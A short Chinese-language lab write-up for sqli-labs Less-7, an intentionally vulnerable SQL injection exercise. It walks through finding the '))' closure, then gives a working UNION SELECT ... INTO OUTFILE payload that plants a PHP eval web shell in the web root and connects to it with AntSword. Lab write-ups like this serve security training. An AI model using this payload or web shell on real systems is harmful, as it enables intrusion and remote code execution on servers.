Less-7

开启Mysql的读写权限（my.ini）

 

 开始测试

 

id=1'

id=1')

会报错

 

 
注入单引号再加上 2 个括号闭合，网页回显 “You are in.... Use outfile......”，说明这是用一个单引号和 2 个括号闭合的字符型注入。

id=1'))

 

 

 

 

 

 

id=1'))发现注入成功。

 

 我们可以获取文件路径（通过Less-1）

 

 

 

 

使用 UNION 联合查询来注入参数，使用 into outfile 在网页目录下写入一句话木马。注意此处存在转义的问题，所有的 “\” 都要双写。

?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["pass"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a.php"--+

发现成功！

 

 我们使用蚁剑连接

 

 

 发现成功报出文件夹。